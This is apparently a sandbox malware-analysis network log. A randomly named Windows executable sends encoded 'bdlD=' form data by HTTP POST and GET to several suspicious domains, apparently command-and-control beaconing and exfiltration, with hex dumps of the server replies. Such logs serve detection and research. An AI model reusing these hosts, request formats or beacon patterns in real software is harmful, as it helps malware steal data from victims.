                                                                                                                                Nov 18, 2024 16:28:06.896404982 CET423INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:28:04 GMT
                                                                                                                                Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                40192.168.2.65002723.106.59.18801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:08.657624006 CET397OUTGET /95c0/?bdlD=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4XocmoyAxgZDXS9ILoL/richVPo7jE4Ugu66IHT+Zvw5gPpB1yeo=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.vehiculargustav.click
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:28:09.497873068 CET423INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:28:07 GMT
                                                                                                                                Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                41192.168.2.650028208.91.197.27801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:23.337167025 CET646OUTPOST /fjsq/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.yushaliu.online
                                                                                                                                Origin: http://www.yushaliu.online
                                                                                                                                Referer: http://www.yushaliu.online/fjsq/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 77 46 2b 79 72 50 58 49 58 2b 77 63 6e 7a 78 31 58 6b 62 41 35 4b 54 76 68 4a 46 58 39 44 49 66 36 41 56 4a 36 72 73 6e 48 58 39 44 6e 4a 78 6c 55 67 51 46 55 4b 71 41 72 70 66 4e 6c 4e 74 6e 7a 45 63 6d 72 43 2b 5a 53 47 61 49 55 71 66 61 43 44 63 34 4c 4c 63 58 76 55 79 39 4f 42 30 30 42 4e 75 35 6d 34 67 78 41 7a 55 43 61 58 45 69 2f 4a 46 74 79 48 49 50 6a 41 4c 45 7a 45 47 71 63 51 79 42 6b 34 33 54 6b 53 39 49 48 2b 69 30 6c 4c 66 6e 6e 73 37 74 69 58 41 30 39 79 44 71 72 42 6d 44 78 39 75 62 69 68 4f 67 55 35 53 4f 4d 6e 6b 4f 4f 50 56 30 41 64 6e 76 4d 6d 6e 37
                                                                                                                                Data Ascii: bdlD=LrxLbm2PdKLiwF+yrPXIX+wcnzx1XkbA5KTvhJFX9DIf6AVJ6rsnHX9DnJxlUgQFUKqArpfNlNtnzEcmrC+ZSGaIUqfaCDc4LLcXvUy9OB00BNu5m4gxAzUCaXEi/JFtyHIPjALEzEGqcQyBk43TkS9IH+i0lLfnns7tiXA09yDqrBmDx9ubihOgU5SOMnkOOPV0AdnvMmn7


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                42192.168.2.650029208.91.197.27801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:25.882528067 CET670OUTPOST /fjsq/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.yushaliu.online
                                                                                                                                Origin: http://www.yushaliu.online
                                                                                                                                Referer: http://www.yushaliu.online/fjsq/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 69 77 75 79 6f 6f 72 49 66 2b 77 64 6f 54 78 31 43 30 61 4a 35 4b 66 76 68 4d 38 4b 39 51 67 66 36 67 6c 4a 6f 2f 41 6e 45 58 39 44 73 70 78 6b 61 41 51 65 55 4b 6d 79 72 73 2f 4e 6c 4a 4e 6e 7a 45 73 6d 72 53 43 65 53 57 61 4b 42 36 66 59 47 44 63 34 4c 4c 63 58 76 55 33 71 4f 43 45 30 42 39 2b 35 6c 5a 67 32 44 7a 55 44 64 58 45 69 75 5a 46 70 79 48 4a 63 6a 42 58 69 7a 47 2b 71 63 52 69 42 6b 74 62 51 75 53 39 4f 5a 4f 6a 72 6c 5a 69 41 6c 66 4f 52 74 6d 31 52 6d 46 2f 42 71 33 37 5a 74 4f 75 34 77 78 75 69 55 37 4b 38 4d 48 6b 6b 4d 50 74 30 53 4b 72 49 44 53 43 59 48 6b 39 2b 34 61 35 45 6f 48 55 47 79 46 76 30 39 4e 5a 72 4b 41 3d 3d
                                                                                                                                Data Ascii: bdlD=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Qgf6glJo/AnEX9DspxkaAQeUKmyrs/NlJNnzEsmrSCeSWaKB6fYGDc4LLcXvU3qOCE0B9+5lZg2DzUDdXEiuZFpyHJcjBXizG+qcRiBktbQuS9OZOjrlZiAlfORtm1RmF/Bq37ZtOu4wxuiU7K8MHkkMPt0SKrIDSCYHk9+4a5EoHUGyFv09NZrKA==


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                43192.168.2.650030208.91.197.27801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:28.424783945 CET1683OUTPOST /fjsq/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.yushaliu.online
                                                                                                                                Origin: http://www.yushaliu.online
                                                                                                                                Referer: http://www.yushaliu.online/fjsq/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 69 77 75 79 6f 6f 72 49 66 2b 77 64 6f 54 78 31 43 30 61 4a 35 4b 66 76 68 4d 38 4b 39 51 34 66 35 52 46 4a 36 49 55 6e 46 58 39 44 68 4a 78 35 61 41 52 4d 55 4b 50 37 72 73 79 34 6c 50 42 6e 68 58 6b 6d 37 78 61 65 48 6d 61 4b 65 4b 66 64 43 44 64 36 4c 4c 74 2f 76 55 6e 71 4f 43 45 30 42 2f 32 35 7a 34 67 32 46 7a 55 43 61 58 45 75 2f 4a 46 52 79 48 42 4d 6a 43 36 66 7a 58 65 71 66 77 53 42 6d 66 6a 51 30 53 39 4d 59 4f 6a 6a 6c 5a 75 66 6c 66 44 6f 74 6d 41 30 6d 43 58 42 6d 52 57 55 2f 38 79 6c 74 7a 36 76 56 49 69 59 45 69 6f 56 4c 4a 39 66 56 63 75 36 63 6d 43 64 44 41 31 68 79 49 6b 45 6f 52 73 37 79 51 65 71 7a 4e 45 42 5a 76 47 64 6e 61 5a 36 48 56 6a 6a 46 59 72 44 78 37 4f 31 44 39 53 45 5a 74 6b 4f 66 2b 39 54 68 49 43 69 2f 74 4f 31 4b 6e 4a 4e 57 66 65 37 31 42 38 67 36 37 34 4f 4c 37 6f 56 66 74 4e 72 49 52 72 2b 4c 30 63 34 6c 50 50 7a 42 50 6e 46 42 61 5a 51 7a 30 5a 35 2f 47 45 56 64 71 54 56 6d 65 4b 79 79 71 30 4c 49 4f 6c 44 33 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Q4f5RFJ6IUnFX9DhJx5aARMUKP7rsy4lPBnhXkm7xaeHmaKeKfdCDd6LLt/vUnqOCE0B/25z4g2FzUCaXEu/JFRyHBMjC6fzXeqfwSBmfjQ0S9MYOjjlZuflfDotmA0mCXBmRWU/8yltz6vVIiYEioVLJ9fVcu6cmCdDA1hyIkEoRs7yQeqzNEBZvGdnaZ6HVjjFYrDx7O1D9SEZtkOf+9ThICi/tO1KnJNWfe71B8g674OL7oVftNrIRr+L0c4lPPzBPnFBaZQz0Z5/GEVdqTVmeKyyq0LIOlD3RgeeDtESF43ySfNdbc3ZMZoc8sRvnguVGTGLM44EK7VjWtxle7EfOOevoVnS9j1gUVzDQY21PcVrkYOGevG4COnXGJCaEZunyiNijkaZaExcyFyINrM6QEtiEkG7CQbwchqPx03Fvjxwz6eUdMyhj5fjEfkHx0pI7HqfemTKmuc0vhCQvEbzd9628qRiJiI8i2n2yHkukrnNNqM8tZVrlQEyK0ZBRxHhYz642EGY6wVDNhEi1A55sKlFIaCeyoqtjDrXhkbUCe1jN0Nj+VxQ4TmpxCKrZLs+cmVC6E5/IDNFbOeGHa1RtU6x3Waycco4f+qfmPtfKPzNxu/yK6n8HgwgV/T8caJ7SnLhDN2k37w8LgZna906ExnnJDFVbvKUbp4ZBU7INjPw+B/OsQ/rHzCDwG3upkh8bzRj2NiQyVTgTLZA4zzF2DNEXFOg4TmrBv4BChGG1CkFunewzN9oA+vQwWgUOqPM720CuOUzNgTR2tMC6ncgfj5r7paTljN4wGqm6KNzWUzLZCqNrUcurx3PIh3Gvhlgd7RteHaIYVRfU1u+ppoLiOCMIxpWTant4leSc3e3iVw6kYocNWHm5ECN9FLM/o9O5/q7eEil5nyWU6Ts3PE1mnM8NVTfooJW4KygyWB3rjZ+VrCJD3Av3Xalxj3ZvQ7+RW [TRUNCATED]


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                44192.168.2.650031208.91.197.27801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:30.968291044 CET391OUTGET /fjsq/?bdlD=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSYA+LY6DfFhY+Crt0zWizEXMfJfu41KYaKDIGSHYliJNf2GNGmHE=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.yushaliu.online
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:28:32.238030910 CET1236INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 15:28:31 GMT
                                                                                                                                Server: Apache
                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_o3260Zj5vNPQHnH8AHnS41qfYKjE8t4pdI3aYxax/JueGXuur6HuGen+tT4KAPQ1mATUxDgcQFUziu0gErNYQw==
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 61 31 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                Data Ascii: a11c<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprApp
                                                                                                                                Nov 18, 2024 16:28:32.238092899 CET1236INData Raw: 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28
                                                                                                                                Data Ascii: liesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery
                                                                                                                                Nov 18, 2024 16:28:32.238128901 CET1236INData Raw: 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61
                                                                                                                                Data Ascii: ndow.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cm
                                                                                                                                Nov 18, 2024 16:28:32.238163948 CET1236INData Raw: 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d
                                                                                                                                Data Ascii: nction x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1
                                                                                                                                Nov 18, 2024 16:28:32.238198996 CET548INData Raw: 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64
                                                                                                                                Data Ascii: currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length
                                                                                                                                Nov 18, 2024 16:28:32.238233089 CET1236INData Raw: 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e 73 72 63 3d 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 22 2b 6d 2b 22 2f 63 6d 70 22 2b 62 2b 70 2b 22 2e 6a 73 22 3b 6a 2e
                                                                                                                                Data Ascii: .createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChil
                                                                                                                                Nov 18, 2024 16:28:32.238269091 CET146INData Raw: 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b 65
                                                                                                                                Data Ascii: b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=f
                                                                                                                                Nov 18, 2024 16:28:32.238298893 CET1236INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66
                                                                                                                                Data Ascii: unction(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{
                                                                                                                                Nov 18, 2024 16:28:32.238336086 CET1236INData Raw: 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65 6e 67 74 68
                                                                                                                                Data Ascii: removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g=
                                                                                                                                Nov 18, 2024 16:28:32.238513947 CET1236INData Raw: 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29
                                                                                                                                Data Ascii: returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue
                                                                                                                                Nov 18, 2024 16:28:32.238552094 CET1236INData Raw: 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 67 70 70 4c 6f 63 61 74 6f 72 22 29
                                                                                                                                Data Ascii: isablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.c


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                45192.168.2.6500333.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:37.483262062 CET661OUTPOST /ucmb/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.marketprediction.app
                                                                                                                                Origin: http://www.marketprediction.app
                                                                                                                                Referer: http://www.marketprediction.app/ucmb/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 2f 74 50 34 77 36 76 6b 72 57 47 54 57 45 51 50 39 50 7a 33 4c 42 75 7a 46 41 6a 4b 73 66 64 75 7a 4a 6e 50 4f 4f 31 72 62 75 58 32 34 39 31 72 65 61 47 77 6d 43 78 6a 72 4c 74 69 61 50 65 61 77 48 50 45 4d 50 76 79 31 54 69 2b 5a 76 36 54 76 35 6d 72 6c 34 4e 45 70 53 68 74 46 58 62 38 6d 30 6d 50 37 74 57 31 4b 46 5a 36 39 63 62 44 33 6d 52 4a 67 66 39 45 77 59 61 52 73 34 4e 58 7a 51 34 32 48 36 6b 39 5a 6d 4d 67 33 4f 35 41 2b 39 2b 38 53 73 47 67 61 32 4f 74 38 52 37 57 74 4e 68 6c 76 47 4f 7a 39 36 61 6a 64 30 6d 63 41 50 45 48 59 68 59 43 31 6a 67 72 2f 70 44 37
                                                                                                                                Data Ascii: bdlD=in6yu/YF+9DT/tP4w6vkrWGTWEQP9Pz3LBuzFAjKsfduzJnPOO1rbuX2491reaGwmCxjrLtiaPeawHPEMPvy1Ti+Zv6Tv5mrl4NEpShtFXb8m0mP7tW1KFZ69cbD3mRJgf9EwYaRs4NXzQ42H6k9ZmMg3O5A+9+8SsGga2Ot8R7WtNhlvGOz96ajd0mcAPEHYhYC1jgr/pD7


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                46192.168.2.6500343.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:40.034811020 CET685OUTPOST /ucmb/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.marketprediction.app
                                                                                                                                Origin: http://www.marketprediction.app
                                                                                                                                Referer: http://www.marketprediction.app/ucmb/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
